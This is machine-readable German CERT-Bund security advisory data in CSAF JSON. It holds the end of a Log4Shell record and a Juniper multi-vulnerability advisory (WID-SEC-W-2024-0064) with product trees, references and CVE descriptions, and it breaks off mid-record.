"cpe": "cpe:/a:vmware_tanzu:spring_boot:-"
}
}
}
],
"category": "vendor",
"name": "VMware Tanzu"
},
{
"branches": [
{
"category": "product_name",
"name": "Wibu-Systems CodeMeter",
"product": {
"name": "Wibu-Systems CodeMeter",
"product_id": "812997",
"product_identification_helper": {
"cpe": "cpe:/a:wibu:codemeter:-"
}
}
}
],
"category": "vendor",
"name": "Wibu-Systems"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2021-44228",
"notes": [
{
"category": "description",
"text": "Es existiert eine Schwachstelle in Apache log4j. Die Schwachstelle ist auf eine fehlende Bereinigung von Benutzereingaben zur\u00fcckzuf\u00fchren und ist mithilfe eines manipulierten Strings, welcher einen \"JNDI lookup\" besitzt, anzugreifen. Dadurch wird ein Request zu einem malizi\u00f6sen Server ausgel\u00f6st, der im JNDI lookup definiert ist. Wenn die Antwort einen Pfad zu einer schadhaften Java Klasse besitzt, wird diese in den Prozess des log4j Servers injiziert. Ein entfernter, anonymer Angreifer kann diese Schwachstelle z.B. durch das Senden eines manipulierten Headers ausnutzen, um beliebigen Programmcode auszuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T001160",
"T008876",
"T008873",
"T003343",
"T016816",
"T011128",
"T008911",
"T013661",
"876876",
"T021577",
"398363",
"950382",
"393634",
"T015711",
"2040",
"T021345",
"642",
"2951",
"T019704",
"T003522",
"812997",
"T016315",
"T019995",
"T021953",
"T009185",
"T021270",
"T003085",
"T014765",
"T017100",
"T019402",
"T000126",
"367115",
"778219",
"T009295",
"915286",
"T015887",
"T015127",
"T019293",
"T015520",
"T017032",
"658718",
"T021258",
"1017",
"T021257",
"T014392",
"T021256",
"T021498",
"T021251",
"T021250",
"T021255",
"T021376",
"T021254",
"T021375",
"T021496",
"T021253",
"T006099",
"T021252",
"69412",
"T015519",
"5198",
"T015518",
"T015517",
"T015516",
"T010062",
"T023838",
"T016960",
"T018011",
"T018253",
"T013570",
"668076",
"T018014",
"T015471",
"T014381",
"T021267",
"T002207",
"T018811",
"1024",
"T018812",
"5104",
"T021262",
"T004181",
"196088",
"777623",
"T021266",
"T002044",
"T021265",
"T021264",
"T021263",
"5121",
"67646",
"T015823",
"T015027",
"T012790",
"T021358",
"T021357",
"T021356",
"T000612",
"T021878",
"T021359",
"T005181",
"T005180",
"199167",
"T011337",
"T012302",
"2143",
"T016589",
"T016984",
"T021248",
"T021402",
"T021247",
"T021401",
"T021367",
"T021245",
"T021366",
"T021404",
"T021249",
"T021403",
"T021244",
"T021242"
]
},
"release_date": "2021-12-09T23:00:00.000+00:00",
"title": "CVE-2021-44228"
}
]
}
wid-sec-w-2024-0064
Vulnerability from csaf_certbund
Published
2024-01-10 23:00
Modified
2024-01-10 23:00
Summary
Juniper Produkte: Mehrere Schwachstellen
Notes
Das BSI ist als Anbieter für die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch dafür verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgfältig im Einzelfall zu prüfen.
Produktbeschreibung
JUNOS ist das "Juniper Network Operating System", das in Juniper Appliances verwendet wird.
SRX Series Services Gateways ist ein Next-Generation Anti-Threat Firewall von Juniper.
Bei den Switches der Juniper EX-Serie handelt es sich um Access- und Aggregations-/Core-Layer-Switches.
Die Switches der QFX-Serie von Juniper sichern und automatisieren Netzwerke in Rechenzentren.
Die Juniper MX-Serie ist eine Produktfamilie von Routern.
Angriff
Ein Angreifer aus dem angrenzenden Netzwerk oder ein entfernter, anonymer, authentisierter, lokaler oder physischer Angreifer kann mehrere Schwachstellen in Juniper JUNOS, Juniper JUNOS Evolved, Juniper SRX Series, Juniper EX Series, Juniper QFX Series, Juniper ACX Series, Juniper PTX Series und Juniper MX Series ausnutzen, um beliebigen Code auszuführen, Sicherheitsmaßnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuführen und seine Berechtigungen zu erweitern.
Betroffene Betriebssysteme
- BIOS/Firmware
- Appliance
{
"document": {
"aggregate_severity": {
"text": "hoch"
},
"category": "csaf_base",
"csaf_version": "2.0",
"distribution": {
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "de-DE",
"notes": [
{
"category": "legal_disclaimer",
"text": "Das BSI ist als Anbieter f\u00fcr die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch daf\u00fcr verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgf\u00e4ltig im Einzelfall zu pr\u00fcfen."
},
{
"category": "description",
"text": "JUNOS ist das \"Juniper Network Operating System\", das in Juniper Appliances verwendet wird.\r\nSRX Series Services Gateways ist ein Next-Generation Anti-Threat Firewall von Juniper.\r\nBei den Switches der Juniper EX-Serie handelt es sich um Access- und Aggregations-/Core-Layer-Switches.\r\nDie Switches der QFX-Serie von Juniper sichern und automatisieren Netzwerke in Rechenzentren. \r\nDie Juniper MX-Serie ist eine Produktfamilie von Routern.",
"title": "Produktbeschreibung"
},
{
"category": "summary",
"text": "Ein Angreifer aus dem angrenzenden Netzwerk oder ein entfernter, anonymer, authentisierter, lokaler oder physischer Angreifer kann mehrere Schwachstellen in Juniper JUNOS, Juniper JUNOS Evolved, Juniper SRX Series, Juniper EX Series, Juniper QFX Series, Juniper ACX Series, Juniper PTX Series und Juniper MX Series ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand herbeizuf\u00fchren und seine Berechtigungen zu erweitern.",
"title": "Angriff"
},
{
"category": "general",
"text": "- BIOS/Firmware\n- Appliance",
"title": "Betroffene Betriebssysteme"
}
],
"publisher": {
"category": "other",
"contact_details": "csaf-provider@cert-bund.de",
"name": "Bundesamt f\u00fcr Sicherheit in der Informationstechnik",
"namespace": "https://www.bsi.bund.de"
},
"references": [
{
"category": "self",
"summary": "WID-SEC-W-2024-0064 - CSAF Version",
"url": "https://wid.cert-bund.de/.well-known/csaf/white/2024/wid-sec-w-2024-0064.json"
},
{
"category": "self",
"summary": "WID-SEC-2024-0064 - Portal Version",
"url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2024-0064"
},
{
"category": "external",
"summary": "Juniper Security Advisory JSA11272 vom 2024-01-10",
"url": "https://supportportal.juniper.net/JSA11272"
},
{
"category": "external",
"summary": "Juniper Security Advisory JSA75233 vom 2024-01-10",
"url": "https://supportportal.juniper.net/JSA75233"
},
{
"category": "external",
"summary": "Juniper Security Advisory JSA75721 vom 2024-01-10",
"url": "https://supportportal.juniper.net/JSA75721"
},
{
"category": "external",
"summary": "Juniper Security Advisory JSA75723 vom 2024-01-10",
"url": "https://supportportal.juniper.net/JSA75723"
},
{
"category": "external",
"summary": "Juniper Security Advisory JSA75725 vom 2024-01-10",
"url": "https://supportportal.juniper.net/JSA75725"
},
{
"category": "external",
"summary": "Juniper Security Advisory JSA75727 vom 2024-01-10",
"url": "https://supportportal.juniper.net/JSA75727"
},
{
"category": "external",
"summary": "Juniper Security Advisory JSA75729 vom 2024-01-10",
"url": "https://supportportal.juniper.net/JSA75729"
},
{
"category": "external",
"summary": "Juniper Security Advisory JSA75730 vom 2024-01-10",
"url": "https://supportportal.juniper.net/JSA75730"
},
{
"category": "external",
"summary": "Juniper Security Advisory JSA75733 vom 2024-01-10",
"url": "https://supportportal.juniper.net/JSA75733"
},
{
"category": "external",
"summary": "Juniper Security Advisory JSA75734 vom 2024-01-10",
"url": "https://supportportal.juniper.net/JSA75734"
},
{
"category": "external",
"summary": "Juniper Security Advisory JSA75735 vom 2024-01-10",
"url": "https://supportportal.juniper.net/JSA75735"
},
{
"category": "external",
"summary": "Juniper Security Advisory JSA75736 vom 2024-01-10",
"url": "https://supportportal.juniper.net/JSA75736"
},
{
"category": "external",
"summary": "Juniper Security Advisory JSA75737 vom 2024-01-10",
"url": "https://supportportal.juniper.net/JSA75737"
},
{
"category": "external",
"summary": "Juniper Security Advisory JSA75738 vom 2024-01-10",
"url": "https://supportportal.juniper.net/JSA75738"
},
{
"category": "external",
"summary": "Juniper Security Advisory JSA75740 vom 2024-01-10",
"url": "https://supportportal.juniper.net/JSA75740"
},
{
"category": "external",
"summary": "Juniper Security Advisory JSA75741 vom 2024-01-10",
"url": "https://supportportal.juniper.net/JSA75741"
},
{
"category": "external",
"summary": "Juniper Security Advisory JSA75742 vom 2024-01-10",
"url": "https://supportportal.juniper.net/JSA75742"
},
{
"category": "external",
"summary": "Juniper Security Advisory JSA75743 vom 2024-01-10",
"url": "https://supportportal.juniper.net/JSA75743"
},
{
"category": "external",
"summary": "Juniper Security Advisory JSA75744 vom 2024-01-10",
"url": "https://supportportal.juniper.net/JSA75744"
},
{
"category": "external",
"summary": "Juniper Security Advisory JSA75745 vom 2024-01-10",
"url": "https://supportportal.juniper.net/JSA75745"
},
{
"category": "external",
"summary": "Juniper Security Advisory JSA75747 vom 2024-01-10",
"url": "https://supportportal.juniper.net/JSA75747"
},
{
"category": "external",
"summary": "Juniper Security Advisory JSA75748 vom 2024-01-10",
"url": "https://supportportal.juniper.net/JSA75748"
},
{
"category": "external",
"summary": "Juniper Security Advisory JSA75752 vom 2024-01-10",
"url": "https://supportportal.juniper.net/JSA75752"
},
{
"category": "external",
"summary": "Juniper Security Advisory JSA75753 vom 2024-01-10",
"url": "https://supportportal.juniper.net/JSA75753"
},
{
"category": "external",
"summary": "Juniper Security Advisory JSA75754 vom 2024-01-10",
"url": "https://supportportal.juniper.net/JSA75754"
},
{
"category": "external",
"summary": "Juniper Security Advisory JSA75755 vom 2024-01-10",
"url": "https://supportportal.juniper.net/JSA75755"
},
{
"category": "external",
"summary": "Juniper Security Advisory JSA75757 vom 2024-01-10",
"url": "https://supportportal.juniper.net/JSA75757"
},
{
"category": "external",
"summary": "Juniper Security Advisory JSA75758 vom 2024-01-10",
"url": "https://supportportal.juniper.net/JSA75758"
}
],
"source_lang": "en-US",
"title": "Juniper Produkte: Mehrere Schwachstellen",
"tracking": {
"current_release_date": "2024-01-10T23:00:00.000+00:00",
"generator": {
"date": "2024-08-15T18:03:31.626+00:00",
"engine": {
"name": "BSI-WID",
"version": "1.3.5"
}
},
"id": "WID-SEC-W-2024-0064",
"initial_release_date": "2024-01-10T23:00:00.000+00:00",
"revision_history": [
{
"date": "2024-01-10T23:00:00.000+00:00",
"number": "1",
"summary": "Initiale Fassung"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Juniper EX Series",
"product": {
"name": "Juniper EX Series",
"product_id": "T019811",
"product_identification_helper": {
"cpe": "cpe:/h:juniper:ex:-"
}
}
},
{
"category": "product_name",
"name": "Juniper EX Series 4600",
"product": {
"name": "Juniper EX Series 4600",
"product_id": "T021598",
"product_identification_helper": {
"cpe": "cpe:/h:juniper:ex:ex4600"
}
}
},
{
"category": "product_name",
"name": "Juniper EX Series 4100",
"product": {
"name": "Juniper EX Series 4100",
"product_id": "T030475",
"product_identification_helper": {
"cpe": "cpe:/h:juniper:ex:4100"
}
}
},
{
"category": "product_name",
"name": "Juniper EX Series 4400",
"product": {
"name": "Juniper EX Series 4400",
"product_id": "T030476",
"product_identification_helper": {
"cpe": "cpe:/h:juniper:ex:4400"
}
}
},
{
"category": "product_name",
"name": "Juniper EX Series EX9200",
"product": {
"name": "Juniper EX Series EX9200",
"product_id": "T031997",
"product_identification_helper": {
"cpe": "cpe:/h:juniper:ex:ex9200"
}
}
}
],
"category": "product_name",
"name": "EX Series"
},
{
"branches": [
{
"category": "product_name",
"name": "Juniper JUNOS Evolved",
"product": {
"name": "Juniper JUNOS Evolved",
"product_id": "T018886",
"product_identification_helper": {
"cpe": "cpe:/o:juniper:junos:evolved"
}
}
},
{
"category": "product_name",
"name": "Juniper JUNOS PTX Series",
"product": {
"name": "Juniper JUNOS PTX Series",
"product_id": "T023853",
"product_identification_helper": {
"cpe": "cpe:/o:juniper:junos:ptx_series"
}
}
},
{
"category": "product_name",
"name": "Juniper JUNOS",
"product": {
"name": "Juniper JUNOS",
"product_id": "T030471",
"product_identification_helper": {
"cpe": "cpe:/o:juniper:junos:-"
}
}
},
{
"category": "product_name",
"name": "Juniper JUNOS ACX7024",
"product": {
"name": "Juniper JUNOS ACX7024",
"product_id": "T031994",
"product_identification_helper": {
"cpe": "cpe:/o:juniper:junos:acx7024"
}
}
},
{
"category": "product_name",
"name": "Juniper JUNOS ACX7100-32C",
"product": {
"name": "Juniper JUNOS ACX7100-32C",
"product_id": "T031995",
"product_identification_helper": {
"cpe": "cpe:/o:juniper:junos:acx7100-32c"
}
}
},
{
"category": "product_name",
"name": "Juniper JUNOS ACX7100-48L",
"product": {
"name": "Juniper JUNOS ACX7100-48L",
"product_id": "T031996",
"product_identification_helper": {
"cpe": "cpe:/o:juniper:junos:acx7100-48l"
}
}
}
],
"category": "product_name",
"name": "JUNOS"
},
{
"category": "product_name",
"name": "Juniper MX Series",
"product": {
"name": "Juniper MX Series",
"product_id": "918766",
"product_identification_helper": {
"cpe": "cpe:/h:juniper:mx:-"
}
}
},
{
"category": "product_name",
"name": "Juniper QFX Series 5000",
"product": {
"name": "Juniper QFX Series 5000",
"product_id": "T021597",
"product_identification_helper": {
"cpe": "cpe:/h:juniper:qfx:qfx5000"
}
}
},
{
"category": "product_name",
"name": "Juniper SRX Series",
"product": {
"name": "Juniper SRX Series",
"product_id": "T021593",
"product_identification_helper": {
"cpe": "cpe:/h:juniper:srx_service_gateways:-"
}
}
}
],
"category": "vendor",
"name": "Juniper"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2022-2964",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2022-2964"
},
{
"cve": "CVE-2022-2873",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2022-2873"
},
{
"cve": "CVE-2022-2795",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2022-2795"
},
{
"cve": "CVE-2022-2663",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2022-2663"
},
{
"cve": "CVE-2022-25265",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2022-25265"
},
{
"cve": "CVE-2022-23307",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2022-23307"
},
{
"cve": "CVE-2022-23305",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2022-23305"
},
{
"cve": "CVE-2022-23302",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2022-23302"
},
{
"cve": "CVE-2022-22942",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2022-22942"
},
{
"cve": "CVE-2022-2196",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2022-2196"
},
{
"cve": "CVE-2022-21699",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2022-21699"
},
{
"cve": "CVE-2022-20141",
"notes": [
{
"category": "description",
